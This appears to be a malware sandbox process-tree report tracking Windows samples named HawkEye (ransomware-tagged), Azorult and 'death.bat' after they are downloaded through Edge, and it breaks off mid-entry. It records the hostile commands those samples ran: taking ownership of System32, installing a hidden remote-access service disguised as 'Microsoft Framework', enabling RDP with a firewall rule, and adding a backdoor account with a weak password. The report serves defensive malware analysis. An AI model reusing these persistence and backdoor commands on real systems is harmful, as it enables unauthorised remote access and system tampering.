  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
  2⤵
  PID:2512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
  2⤵
  - Downloads MZ/PE file
  - Suspicious behavior: EnumeratesProcesses
  PID:3140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2900 /prefetch:8
  2⤵
  PID:1756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
  2⤵
  PID:2320
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
  2⤵
  PID:4576
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2348 /prefetch:1
  2⤵
  PID:1464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1
  2⤵
  PID:3880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3792 /prefetch:1
  2⤵
  PID:4416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:1
  2⤵
  PID:968
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5772 /prefetch:8
  2⤵
  PID:3780
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5772 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1
  2⤵
  PID:5232
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:1
  2⤵
  PID:5240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1
  2⤵
  PID:5616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:1
  2⤵
  PID:4320
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5944 /prefetch:1
  2⤵
  PID:5612
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:1
  2⤵
  PID:620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1256 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1
  2⤵
  PID:1556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4936 /prefetch:1
  2⤵
  PID:2924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:1
  2⤵
  PID:748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3564 /prefetch:1
  2⤵
  PID:2676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5068 /prefetch:8
  2⤵
  PID:5504
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1744 /prefetch:1
  2⤵
  PID:5552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4884 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\delete.bat" "
  2⤵
  PID:3892
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5284 /prefetch:1
  2⤵
  PID:4476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:1
  2⤵
  PID:2264
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6840 /prefetch:1
  2⤵
  PID:3988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2708 /prefetch:1
  2⤵
  PID:5464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2256 /prefetch:1
  2⤵
  PID:4112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4204 /prefetch:1
  2⤵
  PID:4172
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5984 /prefetch:1
  2⤵
  PID:4868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6288 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\death.bat" "
  2⤵
  - Drops file in Drivers directory
  - Drops file in System32 directory
  PID:5252
- - C:\Windows\system32\net.exe
    net session
    3⤵
    PID:2780
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 session
      4⤵
      PID:1580
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32 /r /d y
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4852
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32 /grant administrators:F /t
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:1
  2⤵
  PID:536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:1
  2⤵
  PID:2544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=7004 /prefetch:8
  2⤵
  PID:2384
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:1
  2⤵
  PID:5960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1784 /prefetch:1
  2⤵
  PID:1188
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5128 /prefetch:1
  2⤵
  PID:4760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7112 /prefetch:1
  2⤵
  PID:5604
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7336 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7224 /prefetch:8
  2⤵
  PID:2208
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7524 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3504
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7268 /prefetch:8
  2⤵
  PID:1904
- C:\Users\Admin\Downloads\HawkEye.exe
  "C:\Users\Admin\Downloads\HawkEye.exe"
  2⤵
  - Chimera
  - Executes dropped EXE
  - Drops desktop.ini file(s)
  - Drops file in Program Files directory
  - Suspicious use of AdjustPrivilegeToken
  PID:5872
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -k "C:\Users\Admin\Downloads\YOUR_FILES_ARE_ENCRYPTED.HTML"
    3⤵
    PID:5020
- C:\Users\Admin\Downloads\HawkEye.exe
  "C:\Users\Admin\Downloads\HawkEye.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:5192
- C:\Users\Admin\Downloads\HawkEye.exe
  "C:\Users\Admin\Downloads\HawkEye.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:848
- C:\Users\Admin\Downloads\HawkEye.exe
  "C:\Users\Admin\Downloads\HawkEye.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2012
- C:\Users\Admin\Downloads\HawkEye.exe
  "C:\Users\Admin\Downloads\HawkEye.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:5180
- C:\Users\Admin\Downloads\HawkEye.exe
  "C:\Users\Admin\Downloads\HawkEye.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:5152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,4616331019525292555,1967030918491358599,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6376 /prefetch:1
  2⤵
  PID:4540
- C:\Users\Admin\Downloads\Azorult.exe
  "C:\Users\Admin\Downloads\Azorult.exe"
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - UAC bypass
  - Blocks application from running via registry modification
  - Drops file in Drivers directory
  - Checks computer location settings
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Modifies WinLogon
  - Hide Artifacts: Hidden Users
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - System policy modification
  PID:384
- - C:\ProgramData\Microsoft\Intel\wini.exe
    C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    PID:3304
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
      4⤵
      Checks computer location settings
      PID:5312
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
        5⤵
        
        PID:5300
      - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg1.reg"
        6⤵
        Runs .reg file with regedit
        
        PID:2372
      - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg2.reg"
        6⤵
        System Location Discovery: System Language Discovery
        Runs .reg file with regedit
        
        PID:552
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        6⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:1736
      - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /silentinstall
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:6000
      - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /firewall
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:972
      - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /start
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:1152
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows\*.*
        6⤵
        Views/modifies file attributes
        
        PID:5592
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        6⤵
        Views/modifies file attributes
        
        PID:396
      - C:\Windows\SysWOW64\sc.exe
        
        sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
        6⤵
        Launches sc.exe
        
        PID:6000
      - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService obj= LocalSystem type= interact type= own
        6⤵
        Launches sc.exe
        
        PID:4892
      - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService DisplayName= "Microsoft Framework"
        6⤵
        Launches sc.exe
        
        PID:840
  - - C:\ProgramData\Windows\winit.exe
      "C:\ProgramData\Windows\winit.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:2396
- - C:\programdata\install\cheat.exe
    C:\programdata\install\cheat.exe -pnaxui
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:3268
  - - C:\ProgramData\Microsoft\Intel\taskhost.exe
      "C:\ProgramData\Microsoft\Intel\taskhost.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:3836
    - - C:\programdata\microsoft\intel\P.exe
        
        C:\programdata\microsoft\intel\P.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:116
    - - C:\programdata\microsoft\intel\R8.exe
        
        C:\programdata\microsoft\intel\R8.exe
        5⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious use of SetWindowsHookEx
        
        PID:516
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
        6⤵
        Checks computer location settings
        
        PID:5704
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
        7⤵
        Checks computer location settings
        Modifies registry class
        
        PID:2972
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:916
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1652
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        8⤵
        Delays execution with timeout.exe
        
        PID:2596
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        8⤵
        
        PID:3904
        
        C:\rdp\Rar.exe
        
        "Rar.exe" e -p555 db.rar
        8⤵
        Executes dropped EXE
        
        PID:5528
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1556
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        8⤵
        Delays execution with timeout.exe
        
        PID:5108
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
        8⤵
        Checks computer location settings
        
        PID:4624
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
        9⤵
        
        PID:3616
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:3860
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
        10⤵
        
        PID:2500
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
        10⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2380
        
        C:\Windows\SysWOW64\net.exe
        
        net.exe user "john" "12345" /add
        10⤵
        
        PID:5248
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user "john" "12345" /add
        11⤵
        
        PID:324
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        10⤵
        
        PID:4996
        
        C:\Windows\SysWOW64\net.exe
        
